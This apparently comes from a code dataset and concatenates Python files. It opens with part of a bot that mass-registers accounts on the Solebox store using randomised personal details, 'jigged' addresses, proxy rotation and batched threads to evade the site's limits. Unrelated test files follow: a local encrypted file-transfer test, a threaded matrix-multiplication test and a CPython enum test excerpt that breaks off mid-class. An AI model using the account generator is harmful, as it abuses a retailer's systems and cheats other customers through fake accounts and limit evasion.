'invadr[oxuser__oxbirthdate][day]': random.randint(1, 31),
'invadr[oxuser__oxbirthdate][month]': random.randint(1, 12),
'invadr[oxuser__oxbirthdate][year]': random.randint(1950, 2003),
'invadr[oxuser__oxfon]': phoneNum,
'lgn_usr': email,
'lgn_pwd': passwd,
'lgn_pwd2': passwd,
'save' : 'Save',
}
register_post = s.post(url='https://www.solebox.com/index.php?lang=1&', headers=headers, data=register_payload, allow_redirects=False)
if register_post.status_code in (302, 200):
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + ' [SUCCESS] -> Successfully created an account.')
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> ERROR %d occurred: Unable to create an account.' % register_post.status_code)
return
time.sleep(1)
with logger.print_lock:
print(gettime() + " [STATUS] -> Trying to update the account's shipping details.")
########## Updating shipping address ##########
s.get(url='https://www.solebox.com/en/my-address/', headers=headers)
update_shipping_payload = {
'stoken': stoken,
'lang': '1',
'listtype': '',
'actcontrol': 'account_user',
'fnc': 'changeuser_testvalues',
'cl': 'account_user',
'CustomError': 'user',
'blshowshipaddress': '1',
'invadr[oxuser__oxsal]': random.choice(['MR', 'MRS']), # MR OR MRS
'invadr[oxuser__oxfname]': firstName,
'invadr[oxuser__oxlname]': lastName,
'invadr[oxuser__oxstreet]': jiggedFirstLineAddress,
'invadr[oxuser__oxstreetnr]': houseNum,
'invadr[oxuser__oxaddinfo]': jiggedSecondLineAddress,
'invadr[oxuser__oxzip]': zipcode,
'invadr[oxuser__oxcity]': city,
'invadr[oxuser__oxcountryid]': country_id,
'invadr[oxuser__oxstateid]': stateUS,
'changeClass': 'account_user',
'deladr[oxaddress__oxsal]': random.choice(['MR', 'MRS']), # MR OR MRS
'deladr[oxaddress__oxfname]': firstName,
'deladr[oxaddress__oxlname]': lastName,
'deladr[oxaddress__oxcompany]': '',
'deladr[oxaddress__oxstreet]': jiggedFirstLineAddress,
'deladr[oxaddress__oxstreetnr]': houseNum,
'deladr[oxaddress__oxaddinfo]': jiggedSecondLineAddress,
'deladr[oxaddress__oxzip]': zipcode,
'deladr[oxaddress__oxcity]': city,
'deladr[oxaddress__oxcountryid]': country_id,
'deladr[oxaddress__oxstateid]': stateUS,
'deladr[oxaddress__oxfon]': phoneNum,
}
time.sleep(1)
update_shipping_post = s.post(url='https://www.solebox.com/index.php?lang=1&', headers=headers, data=update_shipping_payload)
if update_shipping_post.status_code in (302,200):
with logger.print_lock:
print(Fore.GREEN + Style.BRIGHT + gettime() + " [SUCCESS] -> Successfully updated the account's shipping details.")
saveEmail(email, passwd)
if webhook_url:
send_webhook(webhook_url, email, passwd)
else:
with logger.print_lock:
print(Fore.RED + gettime() + ' [ERROR] -> ERROR occurred: Unable to edit shipping details.')
saveNoShipEmail(email, passwd)
#################### Loading proxies ####################
proxyList = []
try:
loadProxyUserPass('proxies')
except:
loadProxyIpAuth('proxies')
with logger.print_lock:
print(Style.BRIGHT + Fore.CYAN + 'SOLEBOX ACCOUNT GENERATOR + SHIPPING ADDRESS UPDATER')
totalproxies = len(proxyList)
if int(totalproxies) == 0:
with logger.print_lock:
print('No proxies loaded.')
else:
with logger.print_lock:
print('Loaded ' + Style.BRIGHT + f'{totalproxies}' + Style.NORMAL + ' proxies!')
#################### Generating accounts ####################
########## Checking if countryids are scraped ##########
if os.stat('countrydata.json').st_size == 0:
scrapeCountryIds()
########## Generating the number of accounts specified ##########
print('[STATUS] -> Account generation has started...')
if not proxyList:
if how_many < 3:
for acc in range(how_many):
generateAccount()
else:
with logger.print_lock:
print(Fore.YELLOW + gettime() + ' [WARNING] -> You are trying to create more than 3 accounts with no proxies! Add some proxies and try again.')
# generateAccount()
else:
threads = []
while (how_many / 10 >= 1):
for acc in range(10):
t = threading.Thread(target=generateAccount)
threads.append(t)
t.start()
how_many -= 10
time.sleep(0.5)
print('[STATUS] -> Sleeping for 60sec...')
time.sleep(60)
for t in threads:
t.join()
if (how_many != 0):
for acc in range(how_many):
t = threading.Thread(target=generateAccount)
threads.append(t)
t.start()
time.sleep(0.5)
for t in threads:
t.join()
|
test_sft.py
|
from sys import path
import threading
import time
from sft.listener import SFTListener
from sft.client import SFTClientResponser
from sft.protocol.definition import SFTProtocols, SFTRoles
from hks_pylib.logger import Display
from hks_pylib.logger import StandardLoggerGenerator
from hks_pylib.logger.standard import StdUsers, StdLevels
from hks_pylib.cryptography.ciphers.symmetrics import AES_CTR
KEY = b"0123456789abcedffedcba9876543210"
def run_server(role, is_activate):
logger_generator = StandardLoggerGenerator("tests/sft.{}.log".format(role.name))
listener = SFTListener(
cipher=AES_CTR(KEY),
address=("127.0.0.1", 2000),
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL},
buffer_size=10**8,
)
listener.get_scheme(
SFTProtocols.SFT,
SFTRoles.RECEIVER
).config(directory="tests/")
_print = logger_generator.generate("SFT Listener",
{StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL})
listener.listen()
responser = listener.accept(start_responser=True)
listener.close()
if is_activate:
if role == SFTRoles.RECEIVER:
responser.activate(SFTProtocols.SFT, role, token="tests/file.500MB")
else:
responser.activate(SFTProtocols.SFT, role, path="tests/file.500MB", token="default")
result = responser.wait_result(SFTProtocols.SFT, role, timeout=60)
_print(StdUsers.USER, StdLevels.INFO, "Result:", result)
responser.close()
def run_client(role, is_activate):
logger_generator = StandardLoggerGenerator("tests/sft.{}.log".format(role.name))
client = SFTClientResponser(
cipher=AES_CTR(KEY),
address=("127.0.0.1", 2000),
name="SFTClient",
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL},
buffer_size=10**8
)
client.get_scheme(
SFTProtocols.SFT,
SFTRoles.RECEIVER
).config(directory="tests/")
_print = logger_generator.generate("SFT Client",
{StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL})
client.connect()
client.start(thread=True)
if is_activate:
if role == SFTRoles.RECEIVER:
client.activate(SFTProtocols.SFT, role, token="tests/file.500MB")
else:
client.activate(SFTProtocols.SFT, role, path="tests/file.500MB", token="default")
result = client.wait_result(SFTProtocols.SFT, role, timeout=60)
client.close()
_print(StdUsers.USER, StdLevels.INFO, "Result:", result)
def test_sft():
t1 = threading.Thread(target=run_server, args=(SFTRoles.RECEIVER, True), name="SERVER")
t1.start()
time.sleep(1)
t2 = threading.Thread(target=run_client, args=(SFTRoles.SENDER, False), name="CLIENT")
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
test_sft()
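# Editor's note (assumption, based on the paths used above): the sender side
# transfers tests/file.500MB, so that fixture must already exist before the
# test is run; the receiver is configured to write into the tests/ directory.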
|
camatrix_mult_test.py
|
from math import log10
from threading import Thread
from random import randint
from time import time
import unittest
from pprint import pprint
def threadCompare(A, B, i, j, maxi):
if maxi[0] < A[i][j] : maxi[0] = A[i][j]
if maxi[0] < B[i][j] : maxi[0] = B[i][j]
def threadOne_New(A, C, i, j, P):
C[i] = C[i]*10**(P) + A[i][j]
def threadTwo_New(B, D, i, j, P, N):
D[j] = D[j]*10**(P) + B[N - 1 - i][j]
def threadThree_New(E, C, D, i, j, P, N) :
E[i][j] = int(C[i]*D[j]/(10**(P*(N - 1))))%(10**P)
def new_matrix_multiply(A, B):
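# Editor's sketch of the apparent idea (hedged): pack row i of A and column j
# of B into single big integers C[i] and D[j], using P decimal digits per
# entry. One multiplication C[i]*D[j] then lines the cross terms up in
# P-digit blocks, and the block at position P*(N-1) is exactly
# sum_k A[i][k]*B[k][j], which threadThree_New extracts with a shift and a
# modulus. P is sized so no block overflows into its neighbour; the scheme
# also relies on the per-entry threads appending digits in index order.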
N = len(A)
maxi = [0]
threadSeries = [[Thread(target = threadCompare, args =(A, B, i, j, maxi,)) for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N): threadSeries[i][j].start()
for i in range(N):
for j in range(N): threadSeries[i][j].join()
M = int(log10(maxi[0]))+1
P = int(log10((10**(2*M)-1)*N))+1
C, D, E = [0 for i in range(N)], [0 for i in range(N)], [[0 for j in range(N)] for i in range(N)]
threadSeriesOne = [[Thread(target = threadOne_New, args =(A, C, i, j, P,)) for j in range(N)] for i in range(N)]
threadSeriesTwo = [[Thread(target = threadTwo_New, args =(B, D, i, j, P, N,)) for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N): threadSeriesOne[i][j].start()
for i in range(N):
for j in range(N): threadSeriesOne[i][j].join()
for i in range(N):
for j in range(N): threadSeriesTwo[i][j].start()
for i in range(N):
for j in range(N): threadSeriesTwo[i][j].join()
threadSeriesThree = [[Thread(target = threadThree_New, args =(E, C, D, i, j, P, N,)) for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N): threadSeriesThree[i][j].start()
for i in range(N):
for j in range(N): threadSeriesThree[i][j].join()
return E
def ijk_method(A,B):
N = len(A)
C = [[0 for j in range(N)] for i in range(N)]
for i in range(N):
for j in range(N):
for k in range(N): C[i][j] = C[i][j] + A[i][k]*B[k][j]
return C
class TestCAMatrixProduct(unittest.TestCase):
def test_RandomMatrix1(self):
N = randint(1,3)
A = [ [ randint(1,5) for j in range(N) ] for i in range(N) ]
B = [ [ randint(1,5) for j in range(N) ] for i in range(N) ]
self.assertEqual(ijk_method(A,B), new_matrix_multiply(A,B), msg='Mismatch')
def test_suite():
suite = unittest.TestSuite()
for i in range(20): suite.addTest(unittest.makeSuite(TestCAMatrixProduct))
return suite
test = test_suite()
result = unittest.TestResult()
test.run(result)
print('Number of given tests', result.testsRun)
print('Number of erroneous tests', len(result.errors))
if len(result.errors) != 0:
    print('Erroneous tests')
    pprint(result.errors)
print('Number of tests that failed', len(result.failures))
if len(result.failures) != 0:
    print('Failed tests')
    pprint(result.failures)
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum
from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
python_version = sys.version_info[:2]
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
MODULE = ('test.test_enum', '__main__')[__name__=='__main__']
SHORT_MODULE = MODULE.split('.')[-1]
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# for global repr tests
@enum.global_enum
class HeadlightsK(IntFlag, boundary=enum.KEEP):
OFF_K = 0
LOW_BEAM_K = auto()
HIGH_BEAM_K = auto()
FOG_K = auto()
@enum.global_enum
class HeadlightsC(IntFlag, boundary=enum.CONFORM):
OFF_C = 0
LOW_BEAM_C = auto()
HIGH_BEAM_C = auto()
FOG_C = auto()
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
class DateEnum(date, Enum): pass
self.DateEnum = DateEnum
class FloatEnum(float, Enum): pass
self.FloatEnum = FloatEnum
class Wowser(Enum):
this = 'that'
these = 'those'
def wowser(self):
"""Wowser docstring"""
return ("Wowser! I'm %s!" % self.name)
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.Wowser = Wowser
class IntWowser(IntEnum):
this = 1
these = 2
def wowser(self):
"""Wowser docstring"""
return ("Wowser! I'm %s!" % self.name)
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.IntWowser = IntWowser
class FloatWowser(float, Enum):
this = 3.14
these = 4.2
def wowser(self):
"""Wowser docstring"""
return ("Wowser! I'm %s!" % self.name)
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.FloatWowser = FloatWowser
class WowserNoMembers(Enum):
def wowser(self): pass
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
class SubclassOfWowserNoMembers(WowserNoMembers): pass
self.WowserNoMembers = WowserNoMembers
self.SubclassOfWowserNoMembers = SubclassOfWowserNoMembers
class IntWowserNoMembers(IntEnum):
def wowser(self): pass
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.IntWowserNoMembers = IntWowserNoMembers
class FloatWowserNoMembers(float, Enum):
def wowser(self): pass
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.FloatWowserNoMembers = FloatWowserNoMembers
class EnumWithInit(Enum):
def __init__(self, greeting, farewell):
self.greeting = greeting
self.farewell = farewell
ENGLISH = 'hello', 'goodbye'
GERMAN = 'Guten Morgen', 'Auf Wiedersehen'
def some_method(self): pass
self.EnumWithInit = EnumWithInit
# see issue22506
class SuperEnum1(Enum):
def invisible(self):
return "did you see me?"
class SubEnum1(SuperEnum1):
sample = 5
self.SubEnum1 = SubEnum1
class SuperEnum2(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum2(SuperEnum2):
sample = 5
self.SubEnum2 = SubEnum2
def test_dir_basics_for_all_enums(self):
enums_for_tests = (
# Generic enums in enum.py
Enum,
IntEnum,
StrEnum,
# Generic enums defined outside of enum.py
self.DateEnum,
self.FloatEnum,
# Concrete enums derived from enum.py generics
self.Grades,
self.Season,
# Concrete enums derived from generics defined outside of enum.py
self.Konstants,
self.Holiday,
# Standard enum with added behaviour & members
self.Wowser,
# Mixin-enum-from-enum.py with added behaviour & members
self.IntWowser,
# Mixin-enum-from-outside-enum.py with added behaviour & members
self.FloatWowser,
# Equivalents of the three immediately above, but with no members
self.WowserNoMembers,
self.IntWowserNoMembers,
self.FloatWowserNoMembers,
# Enum with members and an __init__ method
self.EnumWithInit,
# Special cases to test
self.SubEnum1,
self.SubEnum2
)
for cls in enums_for_tests:
with self.subTest(cls=cls):
cls_dir = dir(cls)
# test that dir is deterministic
self.assertEqual(cls_dir, dir(cls))
# test that dir is sorted
self.assertEqual(list(cls_dir), sorted(cls_dir))
# test that there are no dupes in dir
self.assertEqual(len(cls_dir), len(set(cls_dir)))
# test that there are no sunders in dir
self.assertFalse(any(enum._is_sunder(attr) for attr in cls_dir))
self.assertNotIn('__new__', cls_dir)
for attr in ('__class__', '__doc__', '__members__', '__module__'):
with self.subTest(attr=attr):
self.assertIn(attr, cls_dir)
def test_dir_for_enum_with_members(self):
enums_for_test = (
# Enum with members
self.Season,
# IntEnum with members
self.Grades,
# Two custom-mixin enums with members
self.Konstants,
self.Holiday,
# several enums-with-added-behaviour and members
self.Wowser,
self.IntWowser,
self.FloatWowser,
# An enum with an __init__ method and members
self.EnumWithInit,
# Special cases to test
self.SubEnum1,
self.SubEnum2
)
for cls in enums_for_test:
cls_dir = dir(cls)
member_names = cls._member_names_
with self.subTest(cls=cls):
self.assertTrue(all(member_name in cls_dir for member_name in member_names))
for member in cls:
member_dir = dir(member)
# test that dir is deterministic
self.assertEqual(member_dir, dir(member))
# test that dir is sorted
self.assertEqual(list(member_dir), sorted(member_dir))
# test that there are no dupes in dir
self.assertEqual(len(member_dir), len(set(member_dir)))
for attr_name in cls_dir:
with self.subTest(attr_name=attr_name):
if attr_name in {'__members__', '__init__', '__new__', *member_names}:
self.assertNotIn(attr_name, member_dir)
else:
self.assertIn(attr_name, member_dir)
self.assertFalse(any(enum._is_sunder(attr) for attr in member_dir))
def test_dir_for_enums_with_added_behaviour(self):
enums_for_test = (
self.Wowser,
self.IntWowser,
self.FloatWowser,
self.WowserNoMembers,
self.SubclassOfWowserNoMembers,
self.IntWowserNoMembers,
self.FloatWowserNoMembers
)
for cls in enums_for_test:
with self.subTest(cls=cls):
self.assertIn('wowser', dir(cls))
self.assertIn('classmethod_wowser', dir(cls))
self.assertIn('staticmethod_wowser', dir(cls))
self.assertTrue(all(
all(attr in dir(member) for attr in ('wowser', 'classmethod_wowser', 'staticmethod_wowser'))
for member in cls
))
self.assertEqual(dir(self.WowserNoMembers), dir(self.SubclassOfWowserNoMembers))
# Check classmethods are present
self.assertIn('from_bytes', dir(self.IntWowser))
self.assertIn('from_bytes', dir(self.IntWowserNoMembers))
def test_help_output_on_enum_members(self):
added_behaviour_enums = (
self.Wowser,
self.IntWowser,
self.FloatWowser
)
for cls in added_behaviour_enums:
with self.subTest(cls=cls):
rendered_doc = pydoc.render_doc(cls.this)
self.assertIn('Wowser docstring', rendered_doc)
if cls in {self.IntWowser, self.FloatWowser}:
self.assertIn('float(self)', rendered_doc)
def test_dir_for_enum_with_init(self):
EnumWithInit = self.EnumWithInit
cls_dir = dir(EnumWithInit)
self.assertIn('__init__', cls_dir)
self.assertIn('some_method', cls_dir)
self.assertNotIn('greeting', cls_dir)
self.assertNotIn('farewell', cls_dir)
member_dir = dir(EnumWithInit.ENGLISH)
self.assertNotIn('__init__', member_dir)
self.assertIn('some_method', member_dir)
self.assertIn('greeting', member_dir)
self.assertIn('farewell', member_dir)
def test_mixin_dirs(self):
from datetime import date
enums_for_test = (
# generic mixins from enum.py
(IntEnum, int),
(StrEnum, str),
# generic mixins from outside enum.py
(self.FloatEnum, float),
(self.DateEnum, date),
# concrete mixin from enum.py
(self.Grades, int),
# concrete mixin from outside enum.py
(self.Holiday, date),
# concrete mixin from enum.py with added behaviour
(self.IntWowser, int),
# concrete mixin from outside enum.py with added behaviour
(self.FloatWowser, float)
)
enum_dict = Enum.__dict__
enum_dir = dir(Enum)
enum_module_names = enum.__all__
is_from_enum_module = lambda cls: cls.__name__ in enum_module_names
is_enum_dunder = lambda attr: enum._is_dunder(attr) and attr in enum_dict
def attr_is_inherited_from_object(cls, attr_name):
for base in cls.__mro__:
if attr_name in base.__dict__:
return base is object
return False
# General tests
for enum_cls, mixin_cls in enums_for_test:
with self.subTest(enum_cls=enum_cls):
cls_dir = dir(enum_cls)
cls_dict = enum_cls.__dict__
mixin_attrs = [
x for x in dir(mixin_cls)
if not attr_is_inherited_from_object(cls=mixin_cls, attr_name=x)
]
first_enum_base = next(
base for base in enum_cls.__mro__
if is_from_enum_module(base)
)
for attr in mixin_attrs:
with self.subTest(attr=attr):
if enum._is_sunder(attr):
# Unlikely, but no harm in testing
self.assertNotIn(attr, cls_dir)
elif attr in {'__class__', '__doc__', '__members__', '__module__'}:
self.assertIn(attr, cls_dir)
elif is_enum_dunder(attr):
if is_from_enum_module(enum_cls):
self.assertNotIn(attr, cls_dir)
elif getattr(enum_cls, attr) is getattr(first_enum_base, attr):
self.assertNotIn(attr, cls_dir)
else:
self.assertIn(attr, cls_dir)
else:
self.assertIn(attr, cls_dir)
# Some specific examples
int_enum_dir = dir(IntEnum)
self.assertIn('imag', int_enum_dir)
self.assertIn('__rfloordiv__', int_enum_dir)
self.assertNotIn('__format__', int_enum_dir)
self.assertNotIn('__hash__', int_enum_dir)
self.assertNotIn('__init_subclass__', int_enum_dir)
self.assertNotIn('__subclasshook__', int_enum_dir)
class OverridesFormatOutsideEnumModule(Enum):
def __format__(self, *args, **kwargs):
return super().__format__(*args, **kwargs)
SOME_MEMBER = 1
self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule))
self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule.SOME_MEMBER))
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
self.assertEqual(
set(dir(self.SubEnum1.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
self.assertTrue({'description'} <= set(dir(self.SubEnum2.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
3 in Season
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
self.assertTrue(3 in Season)
self.assertFalse('AUTUMN' in Season)
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
